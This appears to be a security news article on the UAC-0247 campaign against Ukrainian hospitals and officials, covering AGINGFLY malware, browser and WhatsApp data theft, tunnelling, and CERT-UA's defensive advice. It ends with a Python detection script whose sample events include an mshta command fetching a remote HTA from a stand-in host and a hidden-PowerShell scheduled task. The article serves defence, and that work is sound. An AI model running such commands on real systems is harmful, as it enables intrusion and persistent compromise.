A threat group tracked as UAC-0247 carried out a major cyber attack on Ukrainian hospitals and local governments, deploying the AGINGFLY malware to steal WhatsApp data and browser passwords. Learn the whole story in this article.
How the Threat First Emerged
A new and very dangerous cyber attack has been detected in Ukraine. In this attack, a previously unknown threat group, tracked as UAC-0247 by researchers, targeted local governments, clinical hospitals and emergency ambulance services in Ukraine starting in October 2025 and continuing through March and April 2026.
This attack was not a one-off incident but an organized and deliberate campaign that targeted different cities and healthcare institutions simultaneously. It has not yet been confirmed to be linked to any particular country or hacker group, but the techniques and tools used are quite advanced. Ukraine's government computer emergency response team, CERT-UA, has documented the case and warned that the campaign is ongoing.
How the Campaign Was Launched
The campaign began with a simple email that appeared genuine and professional. The attacker posed as a humanitarian aid organization, promising humanitarian aid and assistance in war zones. Such messages easily gain trust, especially in a country at war.
The email contained a link, prompting a click. When the victim clicked, it opened either a fake website created using AI tools that appeared genuine, or a real website that had already been compromised through a Cross-Site Scripting vulnerability. The objective in both cases was the same: to deliver an archive file to the victim's computer.
Malicious Archive Execution and Initial Compromise Phase
As soon as the victim opened the downloaded archive, the real game began. Inside the archive was a shortcut file, which has a .LNK extension in Windows. Running this shortcut launched Windows' built-in HTML Application host (mshta.exe), which downloaded a second HTA file from a remote server and executed it.
During this process a fake form also appeared on the screen once, distracting the user while the malware was being installed. A scheduled task was created to run the malware automatically. This technique is called Living off the Land: the attackers use Windows' own tools so that antivirus software does not become suspicious.
AGINGFLY RAT : Browser and WhatsApp Data Theft
The real weapon of this campaign was a malware named AGINGFLY, written in C#. It was a complete remote access tool through which the attacker could gain full control over the infected computer. Through AGINGFLY it was possible to issue commands, download files, take screenshots, activate a keylogger that records every key press, and run code directly in memory.
A special and unusual feature of this malware was that its command handlers, the code that defines what each command does, were not built into the malware. These handlers arrived as source code from the C2 (command-and-control) server and were compiled in real time on the infected system. The advantage of this was that the initial size of the malware remained small, capabilities were added on demand, and it was easier to evade security tools.
The attackers used two different tools for data theft. The first was CHROMELEVATOR, an open-source tool that decrypts and extracts cookies and saved passwords from Chromium-based browsers such as Google Chrome, Microsoft Edge and Brave without an administrator password.
The second tool was ZAPIXDESK, which decrypts the local databases of the WhatsApp application and extracts sensitive data from them. This means that if WhatsApp is installed on a Windows machine and the attacker gains access, messages, contacts and other data are all at risk. Together these two tools completed a very comprehensive data theft operation.
Lateral Movement and Hidden Tunnels
Once inside, the attackers didn't stop there. They tried to strengthen their grip even deeper within the network. For this purpose, RustScan, a publicly available port scanner, was used to identify which other computers were on the network. To go further, tunneling tools such as LIGOLO-NG and Chisel, which create hidden network tunnels, were deployed.
In one incident, the attackers even installed the XMRIG cryptocurrency miner, hidden within the WireGuard program. This shows that the attackers' aim was not just to steal data but also to make money.
A PowerShell script named SILENTLOOP was used to maintain persistence and keep the malware running. This script automatically executed commands, updated its configuration and, most interestingly, fetched the latest IP address of its C2 server from a Telegram channel.
SILENTLOOP also had backup mechanisms in case the primary Telegram source failed. This technique is called a dead drop resolver, and because Telegram is a legitimate platform the communication channel is difficult to block directly. A TCP reverse shell named RAVENSHELL was also used for initial access, giving the attackers a direct CMD connection.
Defense Sector Under Attack
This attack was not limited to hospitals. CERT-UA confirmed that personnel of the Ukrainian Defense Forces were also targeted. In one specifically documented incident, on March 10, 2026, a fake update of the BACHU software was sent via the Signal messenger.
BACHU is the name of a software tool used by Ukrainian FPV drone operators. The attackers sent a trojanized version of this tool packaged in a file named bacha.zip. As soon as someone downloaded and ran the tool, AGINGFLY was installed through DLL side-loading. This shows that the attackers designed a different, targeted lure for military targets.
How to Defend Against This Threat
CERT-UA has provided organizations with some important steps to protect themselves from such attacks. The first and most important recommendation is to restrict the execution of .LNK, .HTA and .JS file extensions on endpoint systems.
In many organizations these files run automatically, which poses a risk. Secondly, limit the use of Windows built-in tools such as mshta.exe, powershell.exe and wscript.exe, as these tools were abused in this campaign. These restrictions don't require any third-party tools; they can all be applied through Windows' own settings. Links received via email, especially those with a humanitarian or official appearance, should always be verified before clicking on them.
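One way to turn the chain described in this article into detection logic, as an added example that is not from CERT-UA or the article: a small rule set run over Sysmon-style process-creation records (parent image, image, command line). The event records, hostnames and paths are constructed sample data; the parent-process lists are assumptions about typical shell and archiver parents.

```python
import re

# Constructed sample events (parent image, image, command line), not real telemetry.
SAMPLE_EVENTS = [
    ("explorer.exe", "mshta.exe", "mshta.exe https://aid-portal.invalid/stage2.hta"),
    ("mshta.exe", "schtasks.exe",
     'schtasks.exe /create /tn "SystemUpdate" /sc minute /mo 5 '
     '/tr "powershell.exe -w hidden -f C:\\ProgramData\\sl.ps1"'),
    ("svchost.exe", "powershell.exe",
     "powershell.exe -w hidden -ep bypass -f C:\\ProgramData\\sl.ps1"),
    ("explorer.exe", "wscript.exe", 'wscript.exe "C:\\Users\\olena\\Downloads\\form.js"'),
    ("explorer.exe", "notepad.exe", "notepad.exe C:\\Users\\olena\\Documents\\report.txt"),
]

# Script hosts named in the article plus cscript.exe (assumption: same family).
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Assumption: parents that mean "a user double-clicked something".
USER_SHELLS = {"explorer.exe", "7zfm.exe", "winrar.exe"}
RESTRICTED_EXT = re.compile(r"\.(lnk|hta|js)\b", re.IGNORECASE)
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
PS_HIDDEN = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass", re.IGNORECASE)


def classify(parent, image, cmdline):
    """Return the names of every rule that one process-creation event triggers."""
    hits = []
    parent, image, lowered = parent.lower(), image.lower(), cmdline.lower()
    # Stage 1 of the campaign: mshta.exe pulling an HTA from a remote server.
    if image == "mshta.exe" and REMOTE_URL.search(lowered):
        hits.append("mshta_remote_hta")
    # Persistence: a scheduled task created by a script host rather than an admin.
    if image == "schtasks.exe" and "/create" in lowered and parent in SCRIPT_HOSTS:
        hits.append("schtask_from_script_host")
    # Hidden or policy-bypassing PowerShell, as a SILENTLOOP-style runner would use.
    if image == "powershell.exe" and PS_HIDDEN.search(lowered):
        hits.append("powershell_hidden_or_bypass")
    # The extensions CERT-UA recommends restricting, launched from a user shell.
    if parent in USER_SHELLS and RESTRICTED_EXT.search(lowered):
        hits.append("restricted_extension_from_shell")
    return hits


def scan(events):
    """Map the index of each flagged event to the rules it triggered."""
    flagged = {}
    for i, (parent, image, cmdline) in enumerate(events):
        hits = classify(parent, image, cmdline)
        if hits:
            flagged[i] = hits
    return flagged
```

Running `scan(SAMPLE_EVENTS)` flags the first four events and leaves the notepad launch alone; in production the same rules would consume Sysmon Event ID 1 or Windows 4688 records.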
Conclusion
The UAC-0247 campaign is an important reminder that cyber threats don't just target corporations or banks; hospitals, emergency services and organizations operating in conflict-prone areas are also frequently targeted. These organizations are already under pressure, have busy staff and often lack security training, which makes such campaigns more successful there.
AGINGFLY's dynamic compilation technique, the use of Telegram for C2 resolution and the combination of multiple tools indicate that the attackers are highly experienced and well-resourced. The timely disclosure and technical analysis by CERT-UA show that the cybersecurity community is taking such threats seriously and is not delaying in informing defenders.